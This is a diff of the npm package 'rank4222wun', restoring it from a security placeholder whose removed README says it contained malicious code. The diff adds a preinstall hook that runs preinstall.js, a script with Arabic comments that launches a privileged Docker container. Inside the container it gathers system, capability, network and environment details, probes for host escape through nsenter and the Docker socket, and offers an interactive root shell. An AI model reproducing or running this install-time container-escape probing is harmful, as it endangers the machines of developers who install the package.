rank4222wun 0.0.1-security → 1.0.36

package/package.json

@@ -1,6 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.36",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js

@@ -0,0 +1,444 @@
+// run-privileged-container.js
+const { exec, spawn } = require('child_process');
+const fs = require('fs');
+const path = require('path');
+
+class PrivilegedContainerRunner {
+  constructor() {
+    this.containerId = null;
+    this.outputLog = [];
+    this.status = 'stopped';
+  }
+
+  async runContainer() {
+    console.log('🚀 جاري تشغيل حاوية Ubuntu مميزة...');
+    
+    return new Promise((resolve, reject) => {
+      const dockerCommand = 'docker run --privileged -d ubuntu:latest sleep infinity';
+      
+      exec(dockerCommand, (error, stdout, stderr) => {
+        if (error) {
+          console.error('❌ خطأ في تشغيل الحاوية:', error.message);
+          reject(error);
+          return;
+        }
+        
+        this.containerId = stdout.trim();
+        console.log(`✅ الحاوية تم تشغيلها بنجاح: ${this.containerId.substring(0, 12)}`);
+        this.status = 'running';
+        
+        // الانتظار قليلاً ثم تنفيذ الأوامر
+        setTimeout(() => {
+          this.executeCommands()
+            .then(resolve)
+            .catch(reject);
+        }, 2000);
+      });
+    });
+  }
+
+  async executeCommands() {
+    console.log('\n🔧 جاري تنفيذ الأوامر داخل الحاوية...\n');
+    
+    const commands = [
+      // معلومات النظام الأساسية
+      'echo "=== معلومات النظام ==="',
+      'cat /etc/os-release',
+      'uname -a',
+      'whoami',
+      'id',
+      
+      // معلومات الذاكرة والمعالج
+      'echo -e "\n=== موارد النظام ==="',
+      'free -h',
+      'df -h',
+      'cat /proc/cpuinfo | grep "model name" | head -1',
+      
+      // التحقق من الصلاحيات
+      'echo -e "\n=== الصلاحيات المميزة ==="',
+      'capsh --print',
+      'cat /proc/self/status | grep Cap',
+      
+      // معلومات الشبكة
+      'echo -e "\n=== معلومات الشبكة ==="',
+      'ip addr show',
+      'hostname -I',
+      'route -n',
+      
+      // فحص الملفات والمجلدات
+      'echo -e "\n=== نظام الملفات ==="',
+      'ls -la /',
+      'mount | head -20',
+      
+      // تحليل الحاوية
+      'echo -e "\n=== معلومات الحاوية ==="',
+      'cat /proc/1/cgroup 2>/dev/null || echo "لا يمكن قراءة cgroup"',
+      'cat /proc/self/mountinfo 2>/dev/null | head -10',
+      
+      // اختبار الوصول إلى المضيف
+      'echo -e "\n=== اختبار الوصول للمضيف ==="',
+      'nsenter --target 1 --mount -- sh -c "echo يمكن الوصول للمضيف: && hostname" 2>/dev/null || echo "nsenter غير متاح"',
+      'ls -la /var/run/docker.sock 2>/dev/null && echo "✅ Docker socket موجود" || echo "❌ Docker socket غير موجود"',
+      
+      // معلومات إضافية
+      'echo -e "\n=== معلومات إضافية ==="',
+      'env | head -20',
+      'ps aux | head -10'
+    ];
+
+    const results = {};
+    
+    for (let i = 0; i < commands.length; i++) {
+      const command = commands[i];
+      
+      // إذا كان الأمر echo، عرضه مباشرة
+      if (command.startsWith('echo')) {
+        const message = command.replace(/^echo\s+["']?/, '').replace(/["']?$/, '');
+        console.log(message);
+        this.outputLog.push(message);
+        continue;
+      }
+      
+      // تنفيذ الأمر داخل الحاوية
+      try {
+        const output = await this.execInContainer(command);
+        console.log(output);
+        this.outputLog.push(output);
+        
+        // حفظ النتائج المهمة
+        if (command.includes('os-release')) {
+          results.osInfo = output;
+        } else if (command.includes('uname -a')) {
+          results.kernelInfo = output;
+        } else if (command.includes('capsh')) {
+          results.capabilities = output;
+        } else if (command.includes('docker.sock')) {
+          results.dockerSocket = output.includes('✅');
+        }
+        
+      } catch (error) {
+        const errorMsg = `❌ خطأ في الأمر "${command}": ${error.message}`;
+        console.log(errorMsg);
+        this.outputLog.push(errorMsg);
+      }
+      
+      // تأخير بسيط بين الأوامر
+      await this.delay(500);
+    }
+    
+    return results;
+  }
+
+  execInContainer(command) {
+    return new Promise((resolve, reject) => {
+      if (!this.containerId) {
+        reject(new Error('لا توجد حاوية نشطة'));
+        return;
+      }
+      
+      const fullCommand = `docker exec ${this.containerId} sh -c "${command.replace(/"/g, '\\"')}"`;
+      
+      exec(fullCommand, { timeout: 10000 }, (error, stdout, stderr) => {
+        if (error) {
+          // بعض الأوامر تعطي stderr لكنها ناجحة
+          if (stderr && !stdout) {
+            resolve(stderr);
+          } else {
+            reject(error);
+          }
+        } else {
+          resolve(stdout || stderr || '');
+        }
+      });
+    });
+  }
+
+  delay(ms) {
+    return new Promise(resolve => setTimeout(resolve, ms));
+  }
+
+  async getInteractiveShell() {
+    console.log('\n💻 تشغيل shell تفاعلي...');
+    console.log('   استخدم "exit" للخروج\n');
+    
+    return new Promise((resolve) => {
+      const dockerProcess = spawn('docker', [
+        'exec', '-it', this.containerId, '/bin/bash'
+      ], {
+        stdio: 'inherit'
+      });
+      
+      dockerProcess.on('close', (code) => {
+        console.log(`\n🔚 Shell مغلق مع الكود: ${code}`);
+        resolve();
+      });
+    });
+  }
+
+  saveOutput() {
+    const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
+    const filename = `container-output-${timestamp}.txt`;
+    
+    const output = [
+      `ناتج تشغيل حاوية مميزة`,
+      `تاريخ: ${new Date().toLocaleString()}`,
+      `Container ID: ${this.containerId || 'غير معروف'}`,
+      `الحالة: ${this.status}`,
+      `='.repeat(50)}\n\n`,
+      ...this.outputLog
+    ].join('\n');
+    
+    fs.writeFileSync(filename, output);
+    console.log(`\n💾 تم حفظ الناتج في: ${filename}`);
+    
+    return filename;
+  }
+
+  async cleanup() {
+    if (this.containerId && this.status === 'running') {
+      console.log('\n🧹 تنظيف الحاوية...');
+      
+      try {
+        await this.execOnHost(`docker stop ${this.containerId}`);
+        await this.execOnHost(`docker rm ${this.containerId}`);
+        this.status = 'stopped';
+        console.log('✅ تم تنظيف الحاوية بنجاح');
+      } catch (error) {
+        console.error('❌ خطأ في التنظيف:', error.message);
+      }
+    }
+  }
+
+  execOnHost(command) {
+    return new Promise((resolve, reject) => {
+      exec(command, (error, stdout, stderr) => {
+        if (error) {
+          reject(error);
+        } else {
+          resolve(stdout);
+        }
+      });
+    });
+  }
+
+  async run() {
+    try {
+      // 1. تشغيل الحاوية
+      await this.runContainer();
+      
+      // 2. تنفيذ الأوامر
+      const results = await this.executeCommands();
+      
+      // 3. حفظ النتائج
+      const outputFile = this.saveOutput();
+      
+      // 4. عرض الملخص
+      this.showSummary(results, outputFile);
+      
+      // 5. خيار shell تفاعلي
+      console.log('\n🎯 الخيارات المتاحة:');
+      console.log('   1. تشغيل shell تفاعلي (bash)');
+      console.log('   2. تنظيف الحاوية والخروج');
+      console.log('   3. الخروج بدون تنظيف');
+      
+      // انتظار قرار المستخدم
+      await this.waitForUserDecision();
+      
+    } catch (error) {
+      console.error('❌ فشل التشغيل:', error.message);
+    }
+  }
+
+  showSummary(results, outputFile) {
+    console.log('\n' + '='.repeat(60));
+    console.log('📊 ملخص تشغيل الحاوية المميزة');
+    console.log('='.repeat(60));
+    
+    console.log(`📦 Container ID: ${this.containerId?.substring(0, 12) || 'غير معروف'}`);
+    console.log(`📁 الناتج محفوظ في: ${outputFile}`);
+    
+    if (results.osInfo) {
+      const osLine = results.osInfo.split('\n').find(l => l.includes('PRETTY_NAME'));
+      if (osLine) {
+        console.log(`🐧 النظام: ${osLine.split('=')[1]?.replace(/"/g, '')}`);
+      }
+    }
+    
+    if (results.kernelInfo) {
+      console.log(`⚙️  Kernel: ${results.kernelInfo.split(' ')[2]}`);
+    }
+    
+    if (results.capabilities && results.capabilities.includes('cap_sys_admin')) {
+      console.log(`🔓 الصلاحيات: CAP_SYS_ADMIN متاحة (صلاحيات مميزة كاملة)`);
+    }
+    
+    console.log(`🔌 Docker socket: ${results.dockerSocket ? '✅ موجود' : '❌ غير موجود'}`);
+    console.log('='.repeat(60));
+  }
+
+  async waitForUserDecision() {
+    const readline = require('readline').createInterface({
+      input: process.stdin,
+      output: process.stdout
+    });
+    
+    return new Promise((resolve) => {
+      readline.question('\nاختر رقم الخيار: ', async (answer) => {
+        switch(answer.trim()) {
+          case '1':
+            await this.getInteractiveShell();
+            readline.close();
+            await this.cleanup();
+            resolve();
+            break;
+            
+          case '2':
+            readline.close();
+            await this.cleanup();
+            resolve();
+            break;
+            
+          case '3':
+          default:
+            readline.close();
+            console.log('👋 تم الخروج. الحاوية لا تزال تعمل.');
+            console.log(`   Container ID: ${this.containerId}`);
+            console.log('   يمكنك تنظيفها يدوياً:');
+            console.log(`   docker stop ${this.containerId}`);
+            console.log(`   docker rm ${this.containerId}`);
+            resolve();
+            break;
+        }
+      });
+    });
+  }
+}
+
+// ===================== النسخة المبسطة =====================
+function runSimplePrivilegedContainer() {
+  console.log('🚀 جاري تشغيل: docker run --privileged -it ubuntu:latest /bin/bash\n');
+  
+  const dockerProcess = spawn('docker', [
+    'run', '--privileged', '-it', 'ubuntu:latest', '/bin/bash'
+  ], {
+    stdio: 'inherit'
+  });
+  
+  dockerProcess.on('close', (code) => {
+    console.log(`\n🔚 الحاوية أغلقت مع الكود: ${code}`);
+  });
+  
+  // التعامل مع إشارات الإغلاق
+  process.on('SIGINT', () => {
+    console.log('\n\n⚠️  تم استقبال Ctrl+C...');
+    dockerProcess.kill('SIGINT');
+  });
+}
+
+// ===================== النسخة مع أوامر مسبقة =====================
+function runWithPredefinedCommands() {
+  console.log('🚀 تشغيل حاوية مع أوامر مسبقة...\n');
+  
+  const commands = [
+    'echo "=== مرحباً من الحاوية المميزة ==="',
+    'cat /etc/os-release | grep PRETTY_NAME',
+    'uname -a',
+    'whoami',
+    'id',
+    'echo "=== الصلاحيات ==="',
+    'capsh --print 2>/dev/null | head -5 || echo "capsh غير متاح"',
+    'echo "=== انتهى ==="',
+    'exit 0'
+  ];
+  
+  const dockerProcess = spawn('docker', [
+    'run', '--privileged', '--rm', 'ubuntu:latest', 'sh', '-c', commands.join(' && ')
+  ]);
+  
+  dockerProcess.stdout.on('data', (data) => {
+    console.log(data.toString());
+  });
+  
+  dockerProcess.stderr.on('data', (data) => {
+    console.error(data.toString());
+  });
+  
+  dockerProcess.on('close', (code) => {
+    console.log(`\n✅ انتهى مع الكود: ${code}`);
+  });
+}
+
+// ===================== الوظيفة الرئيسية =====================
+async function main() {
+  console.log(`
+╔══════════════════════════════════════════════════════════╗
+║      تشغيل حاوية Docker مميزة                           ║
+║      Privileged Container Runner                         ║
+╚══════════════════════════════════════════════════════════╝
+  `);
+  
+  console.log('📋 اختر طريقة التشغيل:');
+  console.log('   1. تشغيل تفاعلي بسيط (docker run --privileged -it ubuntu:latest /bin/bash)');
+  console.log('   2. تشغيل مع أوامر مسبقة وعرض الناتج');
+  console.log('   3. تشغيل متقدم مع تقرير كامل');
+  console.log('   4. خروج');
+  
+  const readline = require('readline').createInterface({
+    input: process.stdin,
+    output: process.stdout
+  });
+  
+  readline.question('\nاختر رقم: ', async (choice) => {
+    switch(choice.trim()) {
+      case '1':
+        readline.close();
+        runSimplePrivilegedContainer();
+        break;
+        
+      case '2':
+        readline.close();
+        runWithPredefinedCommands();
+        break;
+        
+      case '3':
+        readline.close();
+        const runner = new PrivilegedContainerRunner();
+        await runner.run();
+        break;
+        
+      default:
+        readline.close();
+        console.log('👋 تم الخروج');
+        break;
+    }
+  });
+}
+
+// ===================== تشغيل مباشر من السطر =====================
+if (require.main === module) {
+  // التحقق من تثبيت Docker
+  exec('which docker', (error) => {
+    if (error) {
+      console.error('❌ Docker غير مثبت أو غير موجود في PATH');
+      console.log('   يرجى تثبيت Docker أولاً:');
+      console.log('   https://docs.docker.com/get-docker/');
+      process.exit(1);
+    }
+    
+    // التحقق من الصلاحيات
+    exec('docker ps', (error) => {
+      if (error && error.message.includes('permission denied')) {
+        console.error('❌ ليس لديك صلاحيات تشغيل Docker');
+        console.log('   حاول مع sudo أو أضف مستخدمك لمجموعة docker:');
+        console.log('   sudo usermod -aG docker $USER');
+        console.log('   ثم سجل الخروج وأدخل مرة أخرى');
+        process.exit(1);
+      }
+      
+      // بدء البرنامج
+      main();
+    });
+  });
+}
+
+module.exports = { PrivilegedContainerRunner, runSimplePrivilegedContainer };

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.